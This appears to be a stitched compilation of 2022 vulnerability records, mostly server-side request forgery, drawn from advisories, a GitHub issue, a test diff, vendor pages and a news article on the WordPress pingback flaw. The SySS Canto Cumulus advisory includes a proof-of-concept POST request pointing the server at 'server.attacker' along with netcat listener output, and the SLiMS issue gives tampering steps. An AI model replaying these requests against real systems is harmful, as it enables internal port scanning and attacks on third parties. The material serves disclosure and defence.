A remote, unauthenticated attacker can enumerate valid users by sending specific requests to the webservice of MB connect line mymbCONNECT24, mbCONNECT24 and Helmholz myREX24 and myREX24.virtual in all versions through v2.11.2.

2022-09-07 12:56 (CEST) VDE-2022-039  

**Helmholz: Multiple vulnerabilites in myREX24 and myREX24.virtual**  
Share: Email | Twitter  

**

Published

**

2022-09-07 12:56 (CEST)

**

Last update

**

2022-09-07 12:56 (CEST)

**Vendor(s)**

Helmholz GmbH & Co. KG  

**Product(s)**

Article No°

Product Name

Affected Version(s)

myREX24

<= 2.11.2

myREX24.virtual

<= 2.11.2

**

Summary

**

Multiple vulnerabilities have been found in myREX24 and myREX24.virtual. 

**

Vulnerabilities

**

**Weakness**

Improper Restriction of Excessive Authentication Attempts (CWE-307)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. The login pages bruteforce detection is disabled by default._

**Weakness**

Use of Hard-coded Credentials (CWE-798)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. The software uses a secure password for database access, but this password is shared across instances._

**Weakness**

Improper Privilege Management (CWE-269)

**Summary**

_An issue was discovered in the MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 software in all versions through 2.6.1. There is a local privilege escalation from the www-data account to the ..._

**Summary**

_An unauthenticated user can enumerate valid users by checking what kind of response the server sends._

**Weakness**

Server-Side Request Forgery (SSRF) (CWE-918)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. There is an SSRF in thein the MySQL access check, allowing an attacker to scan for open ..._

**Weakness**

Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') (CWE-74)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. There is an outdated and unused component allowing for malicious user input of active code._

**Weakness**

Improper Privilege Management (CWE-269)

**Summary**

_An issue was discovered in MB connect line mymbCONNECT24 and mbCONNECT24 software in all versions through V2.6.2._

**Weakness**

Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 software in all versions through 2.6.2. Inproper use of access validation allows a logged in user to see devices ..._

**Weakness**

Improper Privilege Management (CWE-269)

**Summary**

_An issue was discovered in MB connect line mymbCONNECT24 and mbCONNECT24 software in all versions through V2.6.2._

**Weakness**

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. There is a self XSS issue with a crafted cookie in the login page._

**Weakness**

URL Redirection to Untrusted Site ('Open Redirect') (CWE-601)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. There is an unauthenticated open redirect in the redirect.php._

**Weakness**

Server-Side Request Forgery (SSRF) (CWE-918)

**Summary**

_An issue was discovered in MB connect line mymbCONNECT24 and mbCONNECT24 software in all versions through V2.6.2_ 

**Weakness**

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. There is an incomplete XSS filter allowing an attacker to inject crafted malicious code into the page._

**Weakness**

Server-Side Request Forgery (SSRF) (CWE-918)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. There is an SSRF in the HA module allowing an unauthenticated attacker to scan for open ports._

**Weakness**

Direct Request ('Forced Browsing') (CWE-425)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. An unauthenticated attacker is able to access files (that should have been restricted) via forceful browsing._

**Weakness**

Use of Incorrectly-Resolved Name or Reference (CWE-706)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. An attacker can read arbitrary JSON files via Local File Inclusion._

**Weakness**

Incorrect Resource Transfer Between Spheres (CWE-669)

**Summary**

_An authenticated attacker can change the password of his account into a new password that violates the password policy by intercepting and modifying the request that is send to the ..._

**Weakness**

Uncontrolled Resource Consumption (CWE-400)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. There is an unused function that allows an authenticated attacker to use up all available IPs of ..._

**Weakness**

Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)

**Summary**

_An issue was discovered in MB CONNECT LINE mymbCONNECT24 and mbCONNECT24 through 2.6.2. An incomplete filter applied to a database response allows an authenticated attacker to gain non-public information about ..._

**Weakness**

Cross-site Scripting (XSS) (CWE-79)

**Summary**

_An issue was discovered in MB connect line mymbCONNECT24 and mbCONNECT24 software in all versions through V2.6.2._

**

Impact

**

please see cve id entries

**

Solution

**

****CVE-2020-35557, CVE-2020-35570, CVE-2020-35558,  
CVE-2020-35566, CVE-2020-12527, **CVE-2020-35568**:**** Update to version 2.12.1

**CVE-2020-12528,** **CVE-2020-12529,** **CVE-2020-35560,  
CVE-2020-12530, CVE-2020-35563,** **CVE-2020-35564,  
CVE-2020-35569,** **CVE-2020-35559,**  Update to version >= 2.7.1

**CVE-2020-10384**: Update to version 2.6.2 to close any known way to get to www-data.  
Note: This issue only exists up until version 2.6.1 and has already been addressed in >= 2.6.2

**CVE-2020-35567**: None  
Note: A proper fix for the underlying issue will come with a future architectural core-system-update.

**CVE-2020-35565**: None  
Mitigation: Activate bruteforce detection via Security → Fail2Ban → WebLogin  
Note: A proper fix for the underlying issue will come with a future architectural core-system-update. To further increase the security level of your account enable MFA.

**CVE-2020-35561**: Update to version 2.12.1

**

Reported by

**

OTORIO reported the vulnerabilities to MB connect line.

MB connect line reported the vulnerabilities to Helmholz.

CERT@VDE coordinated.

CVE-2022-22520: VDE-2022-039 | CERT@VDE

Server-Side Request Forgery (SSRF) in GitHub repository ionicabizau/parse-url prior to 8.1.0.

@@ -17,6 +17,7 @@ const INPUTS = \[

, hash: ""

, search: ""

, query: {}

, parse\_failed: false

}

\]

, \[

@@ -32,6 +33,7 @@ const INPUTS = \[

, hash: ""

, search: ""

, query: {}

, parse\_failed: false

}

\]

, \[

@@ -47,6 +49,7 @@ const INPUTS = \[

, hash: "some-hash?foo=bar"

, search: ""

, query: {}

, parse\_failed: false

}

\]

, \[

@@ -62,6 +65,7 @@ const INPUTS = \[

, hash: ""

, search: ""

, query: {}

, parse\_failed: false

}

\]

, \[

@@ -77,6 +81,7 @@ const INPUTS = \[

, hash: ""

, search: ""

, query: {}

, parse\_failed: false

}

\]

, \[

@@ -92,6 +97,7 @@ const INPUTS = \[

, hash: ""

, search: ""

, query: {}

, parse\_failed: false

}

\]

, \[

@@ -107,22 +113,24 @@ const INPUTS = \[

, hash: "http://a:1:1"

, search: ""

, query: {}

, parse\_failed: false

}

\]

, \[

\["git@github.my-enterprise.com:my-org/my-repo.git", false\],

{

protocols: \[ 'ssh' \]

, protocol: 'ssh'

, port: ''

, resource: 'github.my-enterprise.com'

, host: 'github.my-enterprise.com'

, user: 'git'

, password: ''

, pathname: '/my-org/my-repo.git'

, hash: ''

, search: ''

, query: {}

, protocol: 'ssh'

, port: ''

, resource: 'github.my-enterprise.com'

, host: 'github.my-enterprise.com'

, user: 'git'

, password: ''

, pathname: '/my-org/my-repo.git'

, hash: ''

, search: ''

, query: {}

, parse\_failed: false

}

\]

, \[

@@ -138,6 +146,7 @@ const INPUTS = \[

, hash: ""

, search: ""

, query: {}

, parse\_failed: false

}

\]

\];

@@ -165,4 +174,17 @@ tester.describe("check urls", test => {

parseUrl("")

}).toThrow(/invalid url/i)

})

  

test.should("throw if url is too long", () \=> {

parseUrl.MAX\_INPUT\_LENGTH \= 10

test.expect(() \=> {

parseUrl("https://domain.com/")

}).toThrow(/input exceeds maximum length/i)

})

  

test.should("throw if url is invalid", () \=> {

test.expect(() \=> {

parseUrl("foo")

}).toThrow(/url parsing failed/i)

})

});

CVE-2022-2900: Throw if url is invalid. Add a length limit. · IonicaBizau/parse-url@b88c81d

Safe Software FME Server v2022.0.1.1 and below was discovered to contain a XML External Entity (XXE) vulnerability which allows authenticated attackers to perform data exfiltration or Server-Side Request Forgery (SSRF) attacks.

Loading

×Sorry to interrupt

CSS Error

Refresh

CVE-2022-38342: FME Community

**The Integration Solution for Modern Organizations**

**Connect Applications**

Eliminate data silos and move information between 450+ applications using FME's visual interface. Plus, FME's geospatial support allows you to integrate the power of location into all areas of your organization.

Visit the Integration Gallery

**Transform Data**

Ensure data quality throughout the integration lifecycle with FME transformers. Perform unique data processing tasks using any combination of 500+ transformers to modify data exactly for your needs.

Visit the Transformer Gallery

**Automate Workflows**

Save time by using FME to turn manual tasks into repeatable or event-based workflows. By automatically providing integrated data to stakeholders on a real-time or scheduled basis, you'll make everyone's life easier.

Learn About FME Server

**See Why Thousands of Organizations Trust FME**

Read Customer Stories

**FME® Enterprise Integration Platform**

**Our Technology Partners**

**An Integration Solution for Every Industry**

**What Our Customers Have to Say**

See More Customers

CVE-2022-38342: Safe Software | FME | Data Integration Platform

Appsmith v1.7.11 was discovered to allow attackers to execute an authenticated Server-Side Request Forgery (SSRF) via redirecting incoming requests to the AWS internal metadata endpoint.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-38298: fix: Adding a check for invalid hosts on redirects as well by mohanarpit · Pull Request #15782 · appsmithorg/appsmith

SLiMS Senayan Library Management System v9.4.2 was discovered to contain multiple Server-Side Request Forgeries via the components /bibliography/marcsru.php and /bibliography/z3950sru.php.

**The bug**  
A Server Side Request Forgery exists in admin/modules/bibliography/marcsru.php and admin/modules/bibliography/z3950sru.php due to the class in lib/marc/XMLParser.inc.php

**Reproduce**  
Steps to reproduce the behavior:

1.  Go to http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/index.php?mod=bibliography then go to copy cataloguing
2.  choose between marc sru or 23950sru
3.  type in something what you want in the search bar
4.  set burpsuite intercept on
5.  change the z3950_SRU_source or marc_SRU_source parameter value to some url that grab the traffic
6.  forward the request
7.  or just visit http://127.0.0.1:8008/slims9_bulian-9.4.2/admin/modules/bibliography/marcsru.php?keywords=aaaaaaaa&index=0&marc_SRU_source=URL_ENCODED_ENDPOINT_THAT_CAPTURE_HTTP_LIKE_HOOKBIN

**Screenshots**  
Normal requests

Tampered and SSRF trigger(netcat)

Tampered and SSRF trigger(toptal.com)

**Versions**

*   OS: MacOS Mojave 10.14.6
*   Browser: Google Chrome | 103.0.5060.134 (Official Build) (x86\_64)
*   Slims Version: slims9\_bulian-9.4.2

CVE-2022-38292: [Security Bugs]  Server Side Request Forgery · Issue #158 · slims/slims9_bulian

Server-Side Request Forgery (SSRF) vulnerability in Rank Math SEO plugin <= 1.0.95 at WordPress.

**Rank Math SEO plugin vulnerable to Server-Side Request Forgery**

Critical severity GitHub Reviewed Published Sep 10, 2022 • Updated Sep 16, 2022

GHSA-j95r-86hx-xwxg: Rank Math SEO plugin vulnerable to Server-Side Request Forgery

Issue present in pingback requests feature

Issue present in pingback requests feature

  

Researchers have gone public with a six-year-old blind server-side request forgery (SSRF) vulnerability in a WordPress Core feature that could enable distributed denial-of-service (DDoS) attacks.

In a blog post published this week (September 6), Sonar researchers detailed how they were able to exploit a vulnerability in the pingback requests feature within WordPress.

The vulnerability first surfaced in 2017, yet remains unpatched.

**Pingback problem**

Pingback requests allow WordPress authors to be notified when another website links to their blog.

The pingback functionality is exposed on the XMLRPC API, which can be accessed through the file. Using this method, other blogs can announce pingbacks.

Read more of the latest news about web security vulnerabilities

This feature could enable attackers to perform DDoS attacks by maliciously asking thousands of blogs to check for pingbacks on a single victim server, Sonar researchers explained.

Although pingbacks can be turned off via a checkbox, they are still enabled by default on WordPress instances.

It’s worth noting, the researchers pointed out, that they “couldn’t generically identify ways to leverage this behavior to take over vulnerable instances without relying on other vulnerable services”.

Rather, the bug could ease the exploitation of other vulnerabilities in the affected organization’s internal network.

**Bypassing restrictions**

Thomas Chauchefoin, vulnerability researcher at Sonar and author of the blog, told The Daily Swig: “In 2012, the risks around the pingback feature started to be known, and the WordPress maintainers introduced restrictions on the destination of such requests: they would be limited to a restricted set of ports, only public IP addresses, etc.

“In essence, our finding allows getting around some of these restrictions and targeting hosts from the local network. Attackers could use it to send requests to hosts that wouldn’t have been reachable otherwise, for instance, to exploit a vulnerability in internal services.”

He added: “This bug is in the lineage of most CVEs related to pingbacks, but the oldest indicator of a researcher documenting how to get around this specific restriction is from 2017.”

DON’T MISS WordPress warning: 140k BackupBuddy installations on alert over file-read exploitation

SonarSource researchers disclosed the issue to WordPress on January 21. It was acknowledged as a duplicate bug, according to Sonar, which was reported to the WordPress team in January 2017.

Chauchefoin added: “We reported the vulnerability on January 21 through the official channels, with a pretty standard 90-day disclosure policy. After agreeing to a 30-day extension period, we reviewed a first patch still waiting to be merged upstream. Our publication occurs 228 after our initial report.”

A WordPress Security Team spokesperson told The Daily Swig: “As identified in the Sonar blog post, this is a low-impact issue and exploiting it requires ‘\[chaining\] it to additional vulnerabilities in third-party software’.

“As such, the Security Team considers the issue a low priority.”

They added: “Because of its low severity, the team is discussing whether this issue could be fixed in public as a general hardening measure.”

**Mitigation advice**

WordPress told The Daily Swig that exploiting the bug requires “vulnerabilities in multiple systems outside of WordPress”, but that it recommends website owners always use the DNS servers provided by their hosting provider.

They added: “For the pingbacks, users can turn off pingbacks. The XMLRPC endpoint will only make the HTTP requests (detailed in the Sonar blog post) if pingbacks are open for the post being pinged.

“Website owners can (a) turn off pingbacks globally using the code snippet provided in the original post and/or (b) turn off pingbacks for their blog posts.”

Chauchefoin added: “Going public with unpatched bugs is exceptional for us and was a carefully considered decision. As we had proof that our finding collided with previous public work and that it would require significant work to weaponize against real-world environments, we believe that withholding details any longer would only disadvantage defenders.

“We would like to salute the efforts of the WordPress maintainers; even if we couldn't reach the best outcome possible, backporting fixes for the software behind 40% of all websites is not trivial!”

**Previous pingback issue**

Another vulnerability in the pingback requests feature that allowed DDoS attacks was fixed by WordPress core in 2012.

The issue, reported by Acunetix, could be abused in multiple ways, researchers reported, and was fixed “as a public hardening ticket” in WordPress Core version shortly after discovery.

RECOMMENDED Vendor disputes seriousness of firewall plugin RCE flaw

Six-year-old blind SSRF vulnerability in WordPress Core feature could enable DDoS attacks

**v3.0.20 September 14, 2022**

*   Improved: Plugin’s update checking functionality
*   Improved: Removed inStock information from the Review Schema shortcode when Offers and Pros & Cons added to the Product Schema are empty for Editorial Reviews
*   Improved: Query performance to get the Schema templates data based on the Display conditions
*   Improved: Query performance to get the Analytics data
*   Fixed: Missing GTIN in Variable Product Schema even when the value was added in the backend
*   Fixed: Secondary keywords were removed at the time of updating SEO details using the Quick Edit option
*   Fixed: Data sorting option was not working in the Analytics reports
*   Fixed: Editor was crashing at the time of searching for a Singular post in the Schema Template Display Condition option
*   Fixed: Term selection option was not working in the Schema Template Display condition option
*   Fixed: Missing Analytics header options after selecting the Post type

**v3.0.18.1 August 12, 2022**

*   Fixed: Conflict between Rank Math PRO & Elementor PRO, which was breaking the editor

CVE-2022-36376: The Official Rank Math SEO Changelog & Release Notes

A Server-Side Request Forgery issue in Canto Cumulus through 11.1.3 allows attackers to enumerate the internal network, overload network resources, and possibly have unspecified other impact via the server parameter to the /cwc/login login form.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2022-023 Product: Canto Cumulus Manufacturer: Canto Inc. Affected Version(s): Through 11.1.3 Tested Version(s): 11.1.3 (Build 26f5823e) Vulnerability Type: Server-Side Request Forgery (CWE-918) Risk Level: High Solution Status: Mitigation possible Manufacturer Notification: 2022-03-25 Solution Date: No solution Public Disclosure: 2022-06-01 CVE Reference: Not yet assigned Author of Advisory: Thibaud Kehler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Canto Cumulus is a digital asset management (DAM).\[1\] Due to missing validation of untrusted input, the Cumulus web server is vulnerable to server-side request forgery (SSRF) with an unknown proprietary protocol. This behavior poses a risk for denial-of-service (DoS) attacks, impersonation attacks and attacks on the protocol with the theoretical result of remote code execution (RCE) or authentication bypass. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: When logging in to the web server via the form at the URL https://hostname.example/cwc/login, a hidden URL parameter 'server' is sent to the server in the respective HTTP POST request to https://hostname.example/cwc/catalog. Afterwards, the web server establishes a TCP connection to the system specified in that request via an unknown protocol. This yields the following problems: \* Denial of service: The web server keeps the TCP connection open for around 60 seconds. This could be misused to fill limited resources on the server or the server's infrastructure, e.g. NAT tables or connection pools, resulting in a DoS. \* Internal port scan: The web server would respond differently if it was able to establish a connection to the specified TCP port. An attacker could use this behavior to conduct a port scan on the internal network. \* Authentication bypass (theoretical): As the server is specified during authentication, it might be possible that the server-side request is used to verify the credentials given to the login form. An attacker could pretend to be an authentication server and forge a successful login or elevated privileges to the web application. \* Protocol attacks (theoretical): The server-side request uses an unknown binary protocol. An attacker might launch further attacks on that protocol, e.g. buffer overflow or deserialization attacks. In the worst case, if the server implementation of the protocol is vulnerable to such attacks, this will result in RCE on the server. SySS recommends restricting web server-side requests to a limited set of trusted servers. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): An attacker can specify an arbitrary IP address / hostname and port, as depicted in the following HTTP POST request: POST /cwc/catalog HTTP/1.1 Host: hostname.example User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:98.0) Gecko/20100101 Firefox/98.0 Content-Type: application/x-www-form-urlencoded Content-Length: 123 OWASP\_CSRFTOKEN=V1UT-I5A9-QIYJ-HG0C-A1UZ-8Z06-VQ6I-Q6CM&user=guest&password=guest&encmpoding=UTF-8&server=server.attacker:80 During the response, the web server connects to the specified TCP port on the specified host via an unknown proprietary protocol: # ncat -nlvp 80 | hexdump -C Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::80 Ncat: Listening on 0.0.0.0:80 Ncat: Connection from \[WAN IP\]. Ncat: Connection from \[WAN IP\]:10402. 00000000 00 00 00 28 72 65 63 6f 00 00 00 02 00 00 00 04 |...(reco........| 00000010 63 4d 49 44 4c 6f 6e 67 73 69 52 51 00 00 00 04 |cMIDLongsiRQ....| 00000020 53 65 72 23 4c 6f 6e 67 00 04 77 7b 00 00 00 18 |Ser#Long..w{....| 00000030 72 65 63 6f 00 00 00 01 00 00 00 04 63 4d 49 44 |reco........cMID| 00000040 4c 6f 6e 67 51 75 69 74 |LongQuit| 00000048 If the specified host responds in an unexpected way, the web server closes the server-side connection and responds to the initial HTTP request with HTTP error code 302 and a redirection to an error page: HTTP/1.1 302 Server: nginx Date: Wed, 23 Mar 2022 16:31:43 GMT Content-Type: text/json;charset=utf-8 Content-Length: 0 Connection: keep-alive Set-Cookie: JSESSIONID=02505EB227E875FFAC9CB283AF8F16CB; Path=/cwc; Secure; HttpOnly X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=16070400 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Location: /cwc/error.jspx?errorID=CumulusError&errorTitle=Cumulus+error&errorTitle=Cumulus+error&errorMessage=An+error+occured.&disableButtonDashboard=true If the DNS name cannot be resolved or if the specified TCP port is unreachable, the server responds with HTTP error code 500 and renders the login form with HTML containing an additional error message which states that the server could not be reached. This differing behavior enables the internal port scan. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: The manufacturer has not released a patch and will not address the vulnerability. The manufacturer recommends securing the Cumulus server by using a firewall. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2022-03-18: Vulnerability discovered 2022-03-25: Vulnerability reported to the manufacturer 2022-05-11: Manufacturer informed SySS that it will not address the vulnerability 2022-06-01: Public disclosure of the vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for Canto Cumulus https://www.canto.com/de/cumulus/ \[2\] SySS Security Advisory SYSS-2022-023 (not yet published) https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-023.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Thibaud Kehler of SySS GmbH. E-Mail: thibaud.kehler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Thibaud\_Kehler.asc Key ID: 0xB645 7D7A Key Fingerprint: CF29 54F1 1B7F 2FF5 7ED9 9BAD E9C7 9866 B645 7D7A ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEzylU8Rt/L/V+2Zut6ceYZrZFfXoFAmKWCXIACgkQ6ceYZrZF fXqI7A//ZiwtJccj1fcb1EcVK1l4jHU3ZXcJrcYFib4jqzYgZ+NQXA1OVFmJ8P9a MaK9/9GCTjRUnHL0zJfv2Q18GwDaFcq3Ecv61l0IttgOwPmZk3bdGhbiZbuNkid9 n8WBCtzMoPYb8b8BvGDmbjhGcIWfLBJ4hf9nspeIP12MtYNe0qwYXQJsDrZwmUgu bqD5AnXItyYSDe690LRweAh5vAtdvtp+7SQLOPfi49QyG9sxb9jw1qsK8KVZNutt nIwSD5SFrCCgVvEn6E02FHGW7ttEivxSPTN60FsoGhhCD7V1zeu2teNaZvarETek cnSuYgNNBCdPhCm6WDDMgw5vNOUqg0UE1CqZjZ84DBOu4ABBMF4PV9JBFYbOeWTK XYmVsREJVFnvF+qmXDVfEoByaKsXX1yIZkJwGYFXGS3bvFpaipMGLbRFzc49abPI sv5Vth94AmnTyHsG73tM93d3y5BRLpwxwuRSmG5PRzbuZet8ThPH4Hoc1OAysNTa zsCm3VkSemX0Ba8z6mL4IwuknYoetuKQli37jAx7jGsfetFc9tKvHsk3dQ9w+wQG 040DaLa8NsBh+b1PeQZj6AVC+qH6OgGADl5l0Dnh3VcQW3eWUV0YgQofgOsbili6 6CGZNJwE8HkWX5U4HuTaF/A3b8BaFd0IailYTDGc3SaLz4XOAyU= =FDje -----END PGP SIGNATURE-----

Tag

#ssrf